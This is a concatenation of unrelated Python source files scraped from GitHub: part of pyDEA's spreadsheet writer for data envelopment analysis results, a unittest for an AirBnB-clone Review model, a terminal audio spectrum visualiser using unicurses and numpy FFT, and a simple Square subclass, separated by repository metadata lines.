radial_reduction = calculate_radial_reduction(
dmu_code, category, solution._input_data,
solution.get_efficiency_score(dmu_code),
solution.orientation)
non_radial_reduction = calculate_non_radial_reduction(
target, radial_reduction, original)
if abs(non_radial_reduction) < ZERO_TOLERANCE:
non_radial_reduction = 0
work_sheet.write(row_index, 3, target)
work_sheet.write(row_index, 4, radial_reduction)
work_sheet.write(row_index, 5, non_radial_reduction)
if once:
if self.categorical is not None:
work_sheet.write(
row_index, 6,
int(solution._input_data.coefficients[
dmu_code, self.categorical]))
work_sheet.write(
row_index + 1, 0,
solution.get_efficiency_score(dmu_code))
once = False
row_index += 1
else:
work_sheet.write(
row_index, 1, pulp.LpStatus[solution.lp_status[dmu_code]])
row_index += 2
return row_index
class FileWriter(object):
    ''' This class is responsible for writing solution information
        into a given output.
        Attributes:
            params (Parameters): parameters.
            writer: object that has an add_sheet() factory; the produced
                sheets have a name attribute and implement a write method
                that actually writes data to some output (file, screen,
                etc.).
            ranks (list of dict of str to double):
                list that contains dictionaries that map DMU code
                to peel the onion rank.
            categorical (str): name of categorical category.
            run_date (datetime): date and time when the problem was solved.
            total_seconds (float): time (in seconds) needed to solve
                the problem.
            params_sheet (func): callable that writes parameters to a given
                output. It is set only by get_default_worksheets(); it stays
                None when a custom worksheets list is supplied, in which
                case no parameters sheet is written.
            worksheets (list of func): list of functions that will be called
                to write solution information to a given output.
            start_rows (list of int): list of start row indexes for each
                element in worksheets.
            existing_sheets (list of func): contains None references in the
                beginning, but after at least one call to write_data method
                contains a copy of worksheets. It is necessary for appending
                data to the same output.
            print_params (bool): if set to true parameters are written to
                a given output. It ensures that we don't write parameters more
                than once if we should append information to the same output.
        Args:
            params (Parameters): parameters.
            writer: output object, see Attributes.
            run_date (datetime): date and time when the problem was solved.
            total_seconds (float): time (in seconds) needed to solve
                the problem.
            worksheets (list of func, optional): list of functions that will
                be called to write solution information to a given output.
                Defaults to None.
            ranks (list of dict of str to double, optional):
                list that contains dictionaries that map DMU code
                to peel the onion rank. Defaults to None.
            categorical (str, optional): name of categorical category.
                Defaults to None.
    '''
    def __init__(self, params, writer, run_date, total_seconds,
                 worksheets=None, ranks=None, categorical=None):
        self.params = params
        self.writer = writer
        self.ranks = ranks
        self.categorical = categorical
        self.run_date = run_date
        self.total_seconds = total_seconds
        self.params_sheet = None
        if worksheets is not None:
            self.worksheets = worksheets
        else:
            self.worksheets = self.get_default_worksheets()
        self.start_rows = [0] * len(self.worksheets)
        self.existing_sheets = [None] * len(self.worksheets)
        self.print_params = True
    def get_default_worksheets(self):
        ''' Returns a default list of functions that will
            be called to write solution information to a given output.
            As a side effect, initialises params_sheet with the function
            that writes the run parameters.
            Returns:
                list of func: list of functions.
        '''
        sheet_with_categorical_var = SheetWithCategoricalVar(
            self.categorical)
        worksheets = [
            sheet_with_categorical_var.create_sheet_efficiency_scores,
            create_sheet_peers, create_sheet_peer_count,
            sheet_with_categorical_var.create_sheet_input_output_data,
            sheet_with_categorical_var.create_sheet_weighted_data,
            sheet_with_categorical_var.create_sheet_targets]
        if self.ranks:
            onion_rank_sheet = SheetOnionRank(self.ranks)
            worksheets.append(onion_rank_sheet.create_sheet_onion_rank)
        self.params_sheet = SheetWithParameters(
            self.params, self.run_date,
            self.total_seconds).create_sheet_parameters
        return worksheets
    def write_data(self, solution, params_str='', progress_recorder=None):
        ''' Writes given solution to a given output.
            Args:
                solution (Solution): solution.
                params_str (str, optional): string that is usually written in
                    the first row. Defaults to empty string.
                progress_recorder (optional): object with an increment_step()
                    method that shows progress with writing solution to a
                    given output. Defaults to None, in which case a fresh
                    NullProgress is used.
        '''
        # The default used to be NullProgress() evaluated at function
        # definition time, which shared one instance across all calls;
        # a None sentinel creates a fresh recorder per call instead.
        if progress_recorder is None:
            progress_recorder = NullProgress()
        for count, worksheet in enumerate(self.worksheets):
            if self.existing_sheets[count] is None:
                # first call: create the sheet and remember it so later
                # calls append to the same sheet
                work_sheet = self.writer.add_sheet(
                    'Sheet_{count}'.format(count=count))
                self.existing_sheets[count] = work_sheet
            else:
                work_sheet = self.existing_sheets[count]
            # each sheet writer returns its last used row; +1 moves the
            # next append past it
            self.start_rows[count] = (worksheet(work_sheet, solution,
                                                self.start_rows[count],
                                                params_str) + 1)
            progress_recorder.increment_step()
        # parameters are printed only once to file; params_sheet is None
        # when a custom worksheets list was supplied (previously this case
        # raised TypeError: 'NoneType' object is not callable)
        if self.print_params and self.params_sheet is not None:
            # len(self.worksheets) gives the first free sheet index and is
            # also well-defined when worksheets is empty (the old
            # 'count + 1' relied on the loop variable after the loop)
            work_sheet = self.writer.add_sheet(
                'Sheet_{count}'.format(count=len(self.worksheets)))
            self.params_sheet(work_sheet, solution, 0, '')
            progress_recorder.increment_step()
            self.print_params = False
def _calculate_frontier_classification(sum_of_lambda_values):
''' Returns string that describes frontier classification. If
sum_of_lambda_values is > 1, then classification is DRS.
If sum_of_lambda_values is < 1, then
classification is IRS. If sum_of_lambda_values == 1,
then classification is CRS.
Args:
sum_of_lambda_values (double): sum of lambda variables
values.
Returns:
str: frontier classification.
'''
if sum_of_lambda_values > 1:
return 'DRS'
elif sum_of_lambda_values < 1:
return 'IRS'
else:
return 'CRS'
def create_sheet_peers(work_sheet, solution, start_row_index, params_str):
    ''' Writes peers to a given output.

        Each DMU occupies one row per peer with a non-zero lambda value;
        the return-to-scale classification (when available) is written on
        the first peer row only.

        Args:
            work_sheet: object that has name attribute and implements
                write method, it actually writes data to some output
                (like file, screen, etc.).
            solution (Solution): solution.
            start_row_index (int): initial row index (usually used to append
                data to existing output).
            params_str (str): string that is usually written in the first
                row.

        Returns:
            int: index of the last row where data were written plus 1.
    '''
    work_sheet.name = 'Peers'
    work_sheet.write(start_row_index, 0, params_str)
    work_sheet.write(start_row_index + 1, 0, 'DMU')
    work_sheet.write(start_row_index + 1, 2, 'Peer')
    work_sheet.write(start_row_index + 1, 3, 'Lambda')
    # the Classification column is present only when return-to-scale
    # information was recorded on the solution
    write_classification = bool(solution.return_to_scale)
    if write_classification:
        work_sheet.write(start_row_index + 1, 4, 'Classification')
    ordered_dmu_codes = solution._input_data.DMU_codes_in_added_order
    row_index = start_row_index + 2
    for dmu_code in ordered_dmu_codes:
        work_sheet.write(row_index, 0, solution._input_data.get_dmu_user_name(
            dmu_code))
        if solution.lp_status[dmu_code] == pulp.LpStatusOptimal:
            lambda_vars = solution.get_lambda_variables(dmu_code)
            once = True
            for dmu, lambda_value in lambda_vars.items():
                if lambda_value:
                    dmu_name = solution._input_data.get_dmu_user_name(dmu)
                    work_sheet.write(row_index, 2, dmu_name)
                    work_sheet.write(row_index, 3, lambda_value)
                    if write_classification and once:
                        # classification applies to the DMU as a whole,
                        # so write it on the first peer row only
                        work_sheet.write(
                            row_index, 4, solution.return_to_scale[dmu_code])
                        once = False
                    row_index += 1
        else:
            # no optimal solution: record the LP status text instead
            work_sheet.write(
                row_index, 2, pulp.LpStatus[solution.lp_status[dmu_code]])
            row_index += 1
    return row_index
def create_sheet_peer_count(work_sheet, solution, start_row_index, params_str):
    ''' Writes peer counts to a given output.

        The first data row lists the names of all efficient DMUs. Every
        following row holds, for one DMU, the lambda value attached to each
        efficient peer ('-' when the peer is unused). A final row counts how
        many times each efficient DMU was actually used as a peer.

        Args:
            work_sheet: object that has name attribute and implements
                write method, it actually writes data to some output
                (like file, screen, etc.).
            solution (Solution): solution.
            start_row_index (int): initial row index (usually used to append
                data to existing output).
            params_str (str): string that is usually written in the first
                row.

        Returns:
            int: index of the last row where data were written plus 1.
    '''
    work_sheet.name = 'PeerCount'
    work_sheet.write(start_row_index, 0, params_str)
    dmu_order = solution._input_data.DMU_codes_in_added_order
    work_sheet.write(start_row_index + 1, 0, 'Efficient Peers')
    # header: names of all efficient DMUs, in insertion order
    col = 1
    for code in dmu_order:
        if (solution.lp_status[code] == pulp.LpStatusOptimal and
                solution.is_efficient(code)):
            work_sheet.write(start_row_index + 1, col,
                             solution._input_data.get_dmu_user_name(code))
            col += 1
    work_sheet.write(start_row_index + 2, 0, 'DMU')
    # one row per DMU with its lambda value for every efficient peer
    row = start_row_index + 3
    usage_count = defaultdict(int)
    for code in dmu_order:
        work_sheet.write(row, 0,
                         solution._input_data.get_dmu_user_name(code))
        if solution.lp_status[code] == pulp.LpStatusOptimal:
            col = 1
            lambdas = solution.get_lambda_variables(code)
            for peer in dmu_order:
                if (solution.lp_status[peer] == pulp.LpStatusOptimal and
                        solution.is_efficient(peer, lambdas)):
                    # .get() is needed because some lambda variables may
                    # be absent in the categorical model
                    value = lambdas.get(peer, 0)
                    if value:
                        work_sheet.write(row, col, value)
                        usage_count[peer] += 1
                    else:
                        work_sheet.write(row, col, '-')
                    col += 1
        else:
            work_sheet.write(row, 1,
                             pulp.LpStatus[solution.lp_status[code]])
        row += 1
    # final row: how many times each efficient DMU served as a peer
    work_sheet.write(row, 0, 'Peer count')
    col = 1
    for code in dmu_order:
        if code in usage_count:
            work_sheet.write(row, col, usage_count[code])
            col += 1
    return row
| araith/pyDEA | pyDEA/core/data_processing/write_data.py | write_data.py | py | 30,938 | python | en | code | 38 | github-code | 36 |
73243569705 | #!/usr/bin/python3
"""Unittest module for the Review Class."""
import unittest
from datetime import datetime
import time
from models.review import Review
import re
import json
from models.engine.file_storage import FileStorage
import os
from models import storage
from models.base_model import BaseModel
from tests.test_models.test_base_model import TestBaseModel
class TestReview(TestBaseModel):
    """Test cases for the Review class."""

    def setUp(self):
        """Configures the class under test before each test method."""
        self.name = "Review"
        self.value = Review

    def tearDown(self):
        """Cleans up storage after each test method."""
        self.resetStorage()

    def resetStorage(self):
        """Empties FileStorage data both in memory and on disk."""
        FileStorage._FileStorage__objects = {}
        file_path = FileStorage._FileStorage__file_path
        if os.path.isfile(file_path):
            os.remove(file_path)

    def test_instantiation(self):
        """Checks that Review instantiates and subclasses BaseModel."""
        instance = Review()
        self.assertEqual(str(type(instance)),
                         "<class 'models.review.Review'>")
        self.assertIsInstance(instance, Review)
        self.assertTrue(issubclass(type(instance), BaseModel))

    def test_place_id(self):
        """Checks that place_id defaults to an empty string."""
        obj = self.value()
        self.assertTrue(hasattr(obj, "place_id"))
        self.assertEqual(obj.place_id, "")

    def test_user_id(self):
        """Checks that user_id defaults to an empty string."""
        obj = self.value()
        self.assertTrue(hasattr(obj, "user_id"))
        self.assertEqual(obj.user_id, "")

    def test_text(self):
        """Checks that text defaults to an empty string."""
        obj = self.value()
        self.assertTrue(hasattr(obj, "text"))
        self.assertEqual(obj.text, "")
if __name__ == "__main__":
    # Run the test suite when this module is executed directly.
    unittest.main()
| olanipekundenis/AirBnB_clone | tests/test_models/test_review.py | test_review.py | py | 1,721 | python | en | code | 0 | github-code | 36 |
1792979964 | import unicurses
import numpy as np
import math
import wave
import struct
import time
# Terminal setup: raw keypresses, no echo, hidden cursor.
stdscr = unicurses.initscr()
unicurses.cbreak()
unicurses.noecho()
unicurses.curs_set(0)
unicurses.keypad(stdscr, True)
LINES, COLS = unicurses.getmaxyx(stdscr)  # terminal size in character cells
height = 16  # height of each spectrum bar, in character cells
def drawData(data, x, y):
    """Draw each value in ``data`` as a vertical bar of '#' characters.

    Bars are ``height`` cells tall, grow upward from row
    ``y + height - 1``, and column ``x + i`` shows the bar for
    ``data[i]``. Cells above a bar are blanked with spaces.
    """
    for col, value in enumerate(data):
        for row in range(height):
            # keep the original <= value - 1 test: values may be
            # fractional, so this is NOT the same as row < value
            glyph = '#' if row <= value - 1 else ' '
            unicurses.mvaddstr(y + height - 1 - row, x + col, glyph)
# Initialize matrix
matrix = [0, 0, 0, 0, 0, 0, 0, 0]  # one bar level per frequency band
power = []  # NOTE(review): appears unused; calculateLevels uses a local 'power'
weighting = [2, 2, 8, 8, 16, 32, 64, 64] # Change these according to taste
# Set up audio
wavfile = wave.open('data/rebel-theme.wav','r')
sampleRate = wavfile.getframerate()  # frames (samples) per second
noChannels = wavfile.getnchannels()
chunk = 4096 # Use a multiple of 8
def piff(val, sample_rate=None, chunk_size=None):
    """Return the power-array index corresponding to frequency ``val`` (Hz).

    Args:
        val: frequency in Hz.
        sample_rate: frames per second; defaults to the module-level
            ``sampleRate`` for backward compatibility.
        chunk_size: frames per FFT chunk; defaults to the module-level
            ``chunk``.

    Returns:
        int: index of the FFT power bin that holds frequency ``val``.
    """
    if sample_rate is None:
        sample_rate = sampleRate
    if chunk_size is None:
        chunk_size = chunk
    # rfft of a chunk yields chunk/2 usable bins covering 0..sample_rate/2,
    # so each bin is sample_rate / (2 * chunk) Hz wide.
    return int(2 * chunk_size * val / sample_rate)
def calculateLevels(sampleData, chunk):
    """Compute the 8 spectrum-bar levels for one chunk of audio.

    Args:
        sampleData (bytes): raw frames from wave.readframes, interpreted
            as 16-bit signed samples.
        chunk (int): number of frames in the chunk (kept for interface
            compatibility with the call site).

    Returns:
        numpy array of 8 levels, each clipped to [0, height].
    """
    # Convert raw data (16-bit signed PCM) to a numpy array; '//' keeps the
    # struct count an int (len/2 produced a float under Python 3).
    data = struct.unpack("%dh" % (len(sampleData) // 2), sampleData)
    data = np.array(data, dtype='h')
    # Apply FFT - real data; drop the last element so the power array
    # length matches the indices produced by piff().
    fourier = np.fft.rfft(data)
    fourier = np.delete(fourier, len(fourier) - 1)
    power = np.abs(fourier)
    # Average 'amplitude' over octave-wide bands: 0-156.25 Hz, then each
    # band doubling in width, for 8 bands total.
    levels = [0] * 8
    low = 0
    high = 156.25
    for i in range(8):
        levels[i] = int(np.mean(power[piff(low):piff(high):1]))
        low = high
        high *= 2
    # Scale by the per-band weighting and clamp to the display height.
    # (The previous version also rebound the module-level 'matrix' via a
    # 'global' statement; callers only use the return value, so that
    # global mutation was redundant and has been removed.)
    levels = np.divide(np.multiply(levels, weighting), 8000000 / height)
    return levels.clip(0, height)
# time.clock() was deprecated since 3.3 and removed in Python 3.8;
# perf_counter() is the recommended monotonic replacement.
lastTime = time.perf_counter()
frameTime = chunk / sampleRate  # seconds of audio per chunk
data = wavfile.readframes(chunk)
try:
    # readframes returns b'' at end of file, which is falsy; the old
    # "data != ''" test compared bytes to str and was always True in Py3.
    while data:
        matrix = calculateLevels(data, chunk)
        drawData(matrix, 0, 0)
        data = wavfile.readframes(chunk)
        unicurses.refresh()
        # Sleep out the remainder of the frame so the visualisation
        # advances in real time with the audio.
        now = time.perf_counter()
        time.sleep(max(frameTime - (now - lastTime), 0))
        lastTime = now
finally:
    # Always restore the terminal state, even on Ctrl-C or an error.
    unicurses.endwin()
24974566125 | #!/usr/bin/python3
"""Defines a class Square that is a sub class of rectangle"""
Rectangle = __import__('9-rectangle').Rectangle
class Square(Rectangle):
"""A square, sub class of rectangle."""
def __init__(self, size):
"""Inintializes a new instance of Square.
Args:
size (int): size (width and height) of the square
"""
self.integer_validator("size", size)
super().__init__(size, size)
self.__size = size
| Ikechukwu-Miracle/alx-higher_level_programming | 0x0A-python-inheritance/11-square.py | 11-square.py | py | 480 | python | en | code | 0 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.